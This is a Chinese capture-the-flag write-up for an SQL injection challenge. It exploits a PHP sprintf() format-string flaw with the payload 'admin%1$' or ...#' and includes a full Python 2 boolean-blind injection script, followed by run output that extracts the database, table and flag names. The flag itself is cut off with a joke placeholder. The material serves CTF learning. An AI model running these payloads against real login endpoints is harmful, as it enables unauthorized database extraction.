• "迎圣诞,拿大奖"赛题——SQLI


    0x01

    本题所需知识清单:

    1.php sprintf()函数漏洞:https://blog.csdn.net/WQ_BCJ/article/details/85057447

    2.布尔盲注基本payload及流程:https://blog.csdn.net/WQ_BCJ/article/details/84592445

    3.Burp Suite Intruder暴力猜解:https://blog.csdn.net/snert/article/details/49749757

    4.盲注Python 2脚本:

    #coding:utf-8
    import requests
    import string
    
    def boom():
        """Boolean-based blind SQL injection probe used in this write-up.

        Every request is a POST to ``url`` whose ``username`` value starts with
        ``admin%1$'`` followed by an injected condition, plus a dummy
        ``password``.  The reply is classified with two fixed strings:
        ``'password error!'`` is taken as "injected condition TRUE",
        ``'username error!'`` as "FALSE".  Lengths are found with a linear
        ``> i`` scan; each character of a value is found by trying every symbol
        of ``dic`` at that position.  Findings are only printed; nothing is
        returned.

        Written for Python 2 (print statement, string.letters,
        str.encode('hex'), ``str in response.content``).

        Defender's reading of what the code shows: the observable signature is
        a burst of POSTs to one login endpoint whose username field carries
        ``%1$'`` together with ``information_schema``/``substr``/``ascii``, one
        request per candidate character.  Per the write-up, the precondition is
        user input reaching a sprintf() format string and then the SQL text
        unparameterized; the remediation is to keep user input out of format
        strings and to bind query parameters.
        """
        url = r'http://10adf3af0baf4f6389bc0eed2495da87fd5e4464bed344e9.game.ichunqiu.com/'
        s = requests.session()
        # A requests.Session keeps parameters such as cookies across requests:
        # every request sent from the same Session shares one cookie jar, and
        # requests handles cookies automatically, which makes post-login cookie
        # handling convenient.
        dic = string.digits + string.letters + "!@#$%^&*()_+{}-="
        # Candidate alphabet for the per-position character search.  A character
        # that is not in this set can never match, and the inner loops below then
        # append nothing for that position.
        right = 'password error!'
        error = 'username error!'
        lens = 0
        i = 0
        # Determine the length of the current database name: ask
        # "length(database()) > i" for i = 0, 1, ...; the first i answered with
        # 'username error!' (condition false) is taken as the length.
        while True:
            payload = "admin%1$\' or " + "length(database())>" + str(i) + "#"
            data={'username':payload,'password':1}
            r = s.post(url,data=data).content
            # Python 2: r is a str.  Under Python 3 .content is bytes and this
            # membership test would raise TypeError.
            if error in r:
                lens=i
                break
            i+=1
            pass
        print("[+]length(database()): %d" %(lens))
        # Determine the name of the current database one position at a time:
        # positions 0..lens (lens+1 iterations), each tried against every
        # character of dic until 'password error!' (condition true) is seen.
        strs=''
        for i in range(lens+1):
            for c in dic:
                payload = "admin%1$\' or " + "ascii(substr(database()," + str(i) +",1))=" + str(ord(c)) + "#"
                data = {'username':payload,'password':1}
                r = s.post(url,data=data).content
                if right in r:
                    strs = strs + c
                    print strs
                    break
            pass
        pass
        print("[+]database():%s" %(strs))
    
        lens=0
        i = 1
        # Same linear length scan, now for the first table name of the current
        # database (information_schema.tables, limit 0,1).  Note that i starts
        # at 1 here, unlike the other scans which start at 0.
        while True:
            payload = "admin%1$\' or " + "(select length(table_name) from information_schema.tables where table_schema=database() limit 0,1)>" + str(i) + "#"
            # For the current database, query the length of the first table name.
            data = {'username':payload,'password':1}
            r = s.post(url,data=data).content
            if error in r:
                lens = i
                break
            i+=1
            pass
        print("[+]length(table): %d" %(lens))
    
        # Recover the first table's name, character by character.
    
        strs=''
        for i in range(lens+1):
            for c in dic:
                payload = "admin%1$\' or " + "ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1)," + str(i) +",1))=" + str(ord(c)) + "#"
                # Numbers must be passed through str() before being concatenated.
                data = {'username':payload,'password':1}
                r = s.post(url,data=data).content
                if right in r:
                    strs = strs + c
                    print strs
                    break
            pass
        pass
        print("[+]table_name:%s" %(strs))
        tablename = '0x' + strs.encode('hex')
        # Hex-literal form (0x...) of the table name, used as the bare comparison
        # value in the WHERE clauses below (presumably so no quote characters are
        # needed there); the plain text is kept in table_name for FROM clauses.
        table_name = strs
    
        lens=0
        i = 0
        # Length of the first column name of that table.  The lookup filters on
        # table_name only (no table_schema), so limit 0,1 takes the first match
        # across all schemas.
        while True:
            payload = "admin%1$\' or " + "(select length(column_name) from information_schema.columns where table_name = " + str(tablename) + " limit 0,1)>" + str(i) + "#"
            data = {'username':payload,'password':1}
            r = s.post(url,data=data).content
            if error in r:
                lens = i
                break
            i+=1
            pass
        print("[+]length(column): %d" %(lens))
    
        # Recover that column's name, character by character.
        strs=''
        for i in range(lens+1):
            for c in dic:
                payload = "admin%1$\' or " + "ascii(substr((select column_name from information_schema.columns where table_name = " + str(tablename) +" limit 0,1)," + str(i) + ",1))=" + str(ord(c)) + "#"
                data = {'username':payload,'password':1}
                r = s.post(url,data=data).content
                if right in r:
                    strs = strs + c
                    print strs
                    break
            pass
        pass
        print("[+]column_name:%s" %(strs))
        column_name = strs
    
        num=0
        i = 0
        # Number of rows in the table via count(*).  The label printed below says
        # "number(column)", but the value is a row count.
        while True:
            payload = "admin%1$\' or " + "(select count(*) from " + table_name + ")>" + str(i) + "#"
            data = {'username':payload,'password':1}
            r = s.post(url,data=data).content
            if error in r:
                num = i
                break
            i+=1
            pass
        print("[+]number(column): %d" %(num))
    
        lens=0
        i = 0
        # Length of the first value stored in the recovered column.
        while True:
            payload = "admin%1$\' or " + "(select length(" + column_name + ") from " + table_name + " limit 0,1)>" + str(i) + "#"
            data = {'username':payload,'password':1}
            r = s.post(url,data=data).content
            if error in r:
                lens = i
                break
            i+=1
            pass
        print("[+]length(value): %d" %(lens))
    
        i=1
        # This assignment is overwritten immediately by the for loop below.
        strs=''
        for i in range(lens+1):
            for c in dic:
                payload = "admin%1$\' or ascii(substr((select flag from flag limit 0,1)," + str(i) + ",1))=" + str(ord(c)) + "#"
                # Hard-coded "flag from flag" rather than the column_name /
                # table_name recovered above.  password is sent as the string '1'
                # in this loop and as the int 1 everywhere else.
                data = {'username':payload,'password':'1'}
                r = s.post(url,data=data).content
                if right in r:
                    strs = strs + c
                    print strs
                    break
            pass
        pass
        print("[+]flag:%s" %(strs))
    
    if __name__ == '__main__':
        # Script entry point: run the whole probe sequence, then report completion
        # (Python 2 print statement).
        boom()
        print 'Finish!'

    0x02解题具体流程

    #1. 根据题目SQLI可猜测本题可能为SQL注入

           

     #2.尝试弱口令,当username=admin时显示“密码错误”而不是“用户名错误”,可知用户名为admin

          

    #3.使用普通的注入方法:https://blog.csdn.net/WQ_BCJ/article/details/85216275

         无果,可以利用Burp Suite的Intruder查看哪些字符没有被过滤掉,具体使用方法见上面知识清单部分

         破解结果为:对比多条响应的length长度,由异常项发现%字符没有被过滤,且在response里面发现sprintf()函数的报错(参数太少)

                               猜测可以利用sprintf()函数进行注入,下面来验证

         

    #4.输入username=admin%1$' and 1=1 # 得到的结果是username error,换成or则显示password error,证明admin后面的or 1=1 #被执行成功了,验证成功,接下来就是盲注时间了:

     

     #5.利用脚本得到flag:脚本及盲注基础知识在知识清单处有详细介绍

    D:\Python2.7\python2.exe F:/pycharm_work/sqli/sql.py
    [+]length(database()): 3
    c
    ct
    ctf
    [+]database():ctf
    [+]length(table): 4
    f
    fl
    fla
    flag
    [+]table_name:flag
    [+]length(column): 4
    f
    fl
    fla
    flag
    [+]column_name:flag
    [+]number(column): 1
    [+]length(value): 42
    f
    fl
    fla
    flag
    flag{
    flag{b
    flag{b5
    flag{b5b
    flag{b5b3
    flag{b5b36
    flag{b5b361
    flag{b5b3612
    flag{b5b36121
    flag{b5b36121-
    flag{b5b36121-8
    flag{b5b36121-86
    flag{b5b36121-86d
    flag{b5b36121-86dd
    flag{b5b36121-86dd-
    flag{b5b36121-86dd-a
    flag{b5b36121-86dd-a4
    flag{b5b36121-86dd-a4d
    flag{b5b36121-86dd-a4db
    flag{b5b36121-86dd-a4db-
    flag{b5b36121-86dd-a4db-a
    flag{b5b36121-86dd-a4db-aa
    flag{b5b36121-86dd-a4db-aab
    flag{b5b36121-86dd-a4db-aab3
    flag{b5b36121-86dd-a4db-aab3-
    flag{b5b36121-86dd-a4db-aab3-8
    flag{b5b36121-86dd-a4db-aab3-86
    flag{b5b36121-86dd-a4db-aab3-86d
    flag{b5b36121-86dd-a4db-aab3-86dd
    flag{b5b36121-86dd-a4db-aab3-86ddb
    flag{b5b36121-86dd-a4db-aab3-86ddb7
    flag{b5b36121-86dd-a4db-aab3-86ddb74
    flag{b5b36121-86dd-a4db-aab3-86ddb749
    flag{b5b36121-86dd-a4db-aab3-86ddb749d
    flag{b5b36121-86dd-a4db-aab3-86ddb749df
    flag{b5b36121-86dd-a4db-aab3-86ddb749dfa
    flag{自个做一遍去}
    
    Finish!
    
    Process finished with exit code 0
    
  • 原文地址:https://www.cnblogs.com/qingwuyou/p/10687461.html